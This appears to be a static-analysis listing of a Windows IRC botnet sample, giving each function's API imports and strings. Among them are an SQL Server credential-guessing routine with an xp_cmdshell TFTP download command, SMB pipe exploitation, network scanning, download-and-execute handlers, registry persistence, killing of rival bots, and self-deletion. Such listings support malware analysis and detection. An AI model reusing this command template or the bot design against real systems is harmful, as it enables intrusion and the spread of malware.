sub_outside():
KERNEL32.IsDebuggerPresent
KERNEL32.GetSystemDirectoryA
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.CopyFileA
KERNEL32.DeleteFileA
KERNEL32.Sleep
KERNEL32.CreateMutexA
KERNEL32.WaitForSingleObject
KERNEL32.ExitProcess
KERNEL32.GetVersionExA
WS2_32.WSAStartup
WS2_32.WSACleanup
|
sub_418301(02fe):
KERNEL32.Sleep
|
sub_418396(066a):
"%x"
|
sub_419835(0b81):
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
NTDLL.RtlGetLastWin32Error
|
sub_41B1A0(0d4b):
WS2_32.inet_ntoa
"sa"
"root"
"admin"
"DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
"EXEC master..xp_cmdshell 'tftp -i %s GE"...
"%s: Exploited %s."
|
sub_41835D(0f66):
WS2_32.accept
|
sub_417676(115b):
" "
"-s"
"/s"
" "
|
sub_401C1D(16dd):
"http://%s:%d/%s"
|
sub_413A2D(170e):
KERNEL32.Sleep
"%d.%d.%d.%d"
"%s"
"%s"
"%s"
"%s"
|
sub_40F524(1716):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
"USER32.DLL"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
"GetUserObjectInformationA"
"GetProcessWindowStation"
|
sub_4199AC(1b08):
KERNEL32.SuspendThread
KERNEL32.CloseHandle
|
sub_419948(1b08):
KERNEL32.ResumeThread
KERNEL32.CloseHandle
|
sub_416F86(1e1a):
KERNEL32.GetSystemDirectoryA
"%s\\%s"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_41A9DE(21eb):
WS2_32.inet_ntoa
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.ReadFile
KERNEL32.GetTickCount
KERNEL32.CreateEventA
NTDLL.RtlGetLastWin32Error
KERNEL32.WaitForSingleObject
KERNEL32.CloseHandle
"."
"\\\\%s\\ipc$"
"\\\\%s\\pipe\\browser"
"http://%s:%d/%s"
"http://%s:%d/%s"
"%s: Exploited: %s."
|
sub_419C1D(2492):
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.DeleteService
ADVAPI32.CloseServiceHandle
|
sub_41748B(2ce1):
USER32.GetCursorPos
KERNEL32.GetTickCount
"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
"["
"%s%s|"
"%s%s|"
"%sP|"
"%s0%I64u|"
"%s%I64u|"
"%s%c"
"%s]"
|
sub_41A5C1(2ee1):
KERNEL32.lstrlen
"http://%s:%d/%s"
"http://%s:%d/%s"
|
sub_4196D1(3b02):
"hJdXZOPvUVmRJfVS"
"hJdXZOPvUVmRJfVS"
"%s%c"
|
sub_418552(3c6a):
WS2_32.recv
WS2_32.send
KERNEL32.CreateFileA
KERNEL32.GetFileSize
KERNEL32.SetFilePointer
KERNEL32.ReadFile
WS2_32.getpeername
WS2_32.gethostbyaddr
WS2_32.closesocket
"GET"
"Que?"
"HTTP/1.1 501 Not Implemented\r\nContent-L"...
"%s\\%s\\%s"
"%s\\%s\\%s%s"
"%s\\%s"
"Que?"
"Que?"
"HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
"HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
"HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
|
sub_416D6C(3ca9):
KERNEL32.WriteFile
|
sub_419347(3f97):
"192.168.*.*"
"10.*.*.*"
"111.*.*.*"
"15.*.*.*"
"16.*.*.*"
"101.*.*.*"
"110.*.*.*"
"112.*.*.*"
"172.%d.*.*"
|
sub_41A391(4451):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegCloseKey
"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
"~MHz"
"ProcessorNameString"
"%s"
"%s%c"
"Unknown"
"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
|
sub_419677(4a5c):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
"user32.dll"
|
sub_401E82(51a9):
WS2_32.inet_addr
WS2_32.gethostbyaddr
"Net: IP: %s Host: N/A"
"Net: IP: %s Host: %s"
|
sub_401F1C(51c2):
"Scan: Unknown Exploit."
"*.*.*.*"
"-a"
"-b"
"-c"
"Scan: Not Enough Threads. %d Available."...
"%s"
"%d.%d.%d.%d"
"x."
"%d."
"%s%d."
"%sx."
"%sx"
"%s%d"
"%s"
"%d.%d.%d.%d"
"%d.%d.%d.x"
"%d.%d.x.x"
"%d.x.x.x"
"Scan: %s:%d Using %d Threads."
"%s"
"%s"
"Scanner"
|
sub_41C370(5b30):
"download"
"update"
"http"
"sysinfo"
"netinfo"
"scan.start"
"scan.stop"
"scan.stats"
|
sub_4026B9(5f6b):
"invalid string position"
|
sub_40243A(626a):
"Scanner"
"Scan: All Scan Threads Stopped. %d kill"...
|
sub_41A8D5(62e3):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.closesocket
WS2_32.send
|
sub_41B3D0(63b1):
KERNEL32.ExitThread
WS2_32.socket
WS2_32.htons
WS2_32.sendto
WS2_32.recvfrom
WS2_32.inet_ntoa
WS2_32.closesocket
"rb"
"TFTP: Send Complete To %s. %d Total Sen"...
|
sub_417F01(6460):
WS2_32.recv
WS2_32.closesocket
"\r\n"
"%s"
"\r\n"
|
sub_401CC0(6733):
KERNEL32.GlobalMemoryStatus
ADVAPI32.GetUserNameA
KERNEL32.GetSystemDirectoryA
"System: %s [CPU: %i x %s @ %dMhz] [RAM:"...
|
sub_4016BA(6c31):
"list too long"
|
sub_40121E(6c31):
"list too long"
|
sub_4184BF(726a):
"\r\n"
" "
" "
" "
"\r\n\r\n"
|
sub_419A9F(7c37):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegEnumValueA
ADVAPI32.RegCloseKey
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_418E51(7d6d):
KERNEL32.GetVersionExA
"VIS"
"2K3"
"XP"
"2K"
"ME"
"98"
"NT"
"95"
"UNK"
"[OS: Microsoft Windows %s %s (%i.%i bui"...
"%s"
|
sub_41802F(803d):
WS2_32.socket
WS2_32.closesocket
WS2_32.gethostbyname
WS2_32.htons
WS2_32.connect
"ÅÔÆÆ"
"%s %s\r\n"
"%s-%s"
"ÛÜÖÞ"
"ÀÆÐÇ"
"%s %s\r\n%s %s 0 0 :%s\r\n"
|
sub_41829C(823b):
"ÛÜÖÞ"
"%s %s\r\n"
|
sub_418DA0(824c):
KERNEL32.QueryPerformanceCounter
KERNEL32.QueryPerformanceFrequency
|
sub_417119(8739):
KERNEL32.GetSystemDirectoryA
KERNEL32.Sleep
"%s\\%s"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_41397C(8861):
WS2_32.socket
WS2_32.htons
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
|
sub_418FC6(88b5):
WS2_32.getsockname
"%d.%d.%d.%d"
|
sub_419C6D(8916):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegEnumKeyA
ADVAPI32.RegCloseKey
"SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
"%s\\%s"
"LDM"
"NetDDE"
"EventMessageFile"
|
sub_416E5F(8b9b):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegCloseKey
ADVAPI32.RegSetValueExA
|
sub_4172CC(8e72):
WS2_32.send
|
sub_417361(8f5d):
WS2_32.send
"ÅÇÜÃØÆÒ"
"%s %s %s\r\n"
|
sub_418B1F(9941):
KERNEL32.GetSystemDirectoryA
WS2_32.socket
WS2_32.closesocket
WS2_32.htons
WS2_32.bind
WS2_32.WSAAsyncSelect
WS2_32.listen
"%s\\%s"
|
sub_419219(9d2e):
KERNEL32.CreateProcessA
|
sub_416ECD(9e8f):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
|
sub_418E1F(a0a6):
KERNEL32.GetLocaleInfoA
|
sub_419760(a203):
KERNEL32.GetTickCount
ADVAPI32.QueryServiceStatusEx
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
ADVAPI32.ControlService
|
sub_41B5D2(a924):
WS2_32.socket
KERNEL32.ExitThread
WS2_32.setsockopt
WS2_32.htons
WS2_32.bind
WS2_32.closesocket
WS2_32.select
WS2_32.recvfrom
KERNEL32.CreateThread
KERNEL32.Sleep
|
sub_418D17(aecd):
"HS"
|
sub_4195EC(b9ea):
KERNEL32.GetCurrentProcess
KERNEL32.VirtualAllocEx
KERNEL32.VirtualProtectEx
WS2_32.send
KERNEL32.VirtualFreeEx
|
sub_40251A(bde2):
"Statistics: Exploits:"
"%s %s: %d"
"%s; Daemons:"
"%s TFTP: %d"
"%s HTTP: %d"
"%s"
|
sub_414023(c316):
KERNEL32.TerminateThread
|
sub_418C40(c642):
USER32.LoadIconA
USER32.LoadCursorA
USER32.RegisterClassExA
USER32.CreateWindowExA
USER32.TranslateMessage
USER32.DispatchMessageA
USER32.GetMessageA
" "
|
sub_419477(c859):
KERNEL32.ExitProcess
"Registry Monitor"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
|
sub_419EA0(cf88):
KERNEL32.GetCurrentProcessId
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.LoadLibraryA
KERNEL32.GetSystemDirectoryA
KERNEL32.GetCurrentThread
ADVAPI32.OpenThreadToken
NTDLL.RtlGetLastWin32Error
ADVAPI32.ImpersonateSelf
KERNEL32.CloseHandle
KERNEL32.Sleep
KERNEL32.GetCurrentThreadId
"winlogon.exe"
"svchost.exe"
"services.exe"
"OpenThread"
"kernel32.dll"
"OpenProcess"
"kernel32.dll"
"CreateToolhelp32Snapshot"
"kernel32.dll"
"Process32First"
"kernel32.dll"
"kernel32.dll"
"kernel32.dll"
"Module32Next"
"kernel32.dll"
"kernel32.dll"
"Thread32Next"
"kernel32.dll"
"ReadProcessMemory"
"kernel32.dll"
"GetModuleFileNameExA"
"psapi.dll"
"%s\\%s"
"SeDebugPrivilege"
"SeDebugPrivilege"
"System"
"Bot Killed: %s"
|
sub_41B775(dd03):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
"TFTP Server"
|
sub_4140AB(dd4e):
KERNEL32.CreateThread
KERNEL32.WaitForSingleObject
|
sub_41B7F9(e212):
"%s"
"%s%X"
|
sub_4019F3(e2f5):
"¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ"...
"%s"
"DL"
"UPD: Auth Failure."
"UPD: Invalid Arguments."
|
sub_419A10(e5e3):
KERNEL32.CloseHandle
|
sub_419E55(ea56):
KERNEL32.TerminateProcess
KERNEL32.Sleep
KERNEL32.DeleteFileA
|
sub_4051F6(ef17):
KERNEL32.TlsAlloc
|
sub_4190BD(f00f):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetSystemDirectoryA
"@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
"%s\\tmp-%i%i%i-%c%c%c.bat"
"w"
"%s"
|
sub_40177B(f394):
"У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£"...
"%s"
"-e"
"1"
"DL"
"DL: Auth Failure."
"DL: Invalid Arguments"
|
sub_416F32(f3a8):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegCloseKey
ADVAPI32.RegDeleteValueA
|
sub_41783D(fa09):
"%s"
" :"
"%s"
" "
"%s"
" "
"ÅÜÛÒ"
"ÞÜÖÞ"
"ÅÇÜÃØÆÒ"
"ÅÚÛÒ"
"%s %s\r\n"
"ßÚÜÛ"
"%s %s %s\r\n"
"001"
"ßÚÜÛ"
"ØÚÑÐ"
"%s %s %s\r\n%s %s %s\r\n"
"332"
" :"
"%s"
"!"
"%s"
"332"
"%s"
"%s"
"%s"
";"
";"
";"
|
sub_41B925(fdb4):
WININET.InternetOpenA
WININET.InternetOpenUrlA
KERNEL32.CreateFileA
KERNEL32.GetTickCount
WININET.InternetReadFile
KERNEL32.WriteFile
KERNEL32.CloseHandle
KERNEL32.IsDebuggerPresent
KERNEL32.GetCurrentThreadId
"Mozilla/5.0"
"DL: Downloading %s to %s"
"DL: Download %s (%i Bytes) finished in "...
"Main: Uninstalling Drone"
"DL: Failed; Bad Location."
"DL: Failed To Update"
"DL: Error Executing File."
"DL: Executed File: %s"
"DL: Failed; Bad URL"
"DL: Failed; WinINET Error"
|